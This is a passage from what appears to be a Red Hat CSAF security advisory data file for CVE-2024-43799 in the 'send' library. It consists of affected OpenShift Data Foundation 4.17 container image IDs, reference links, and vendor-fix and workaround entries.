"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", 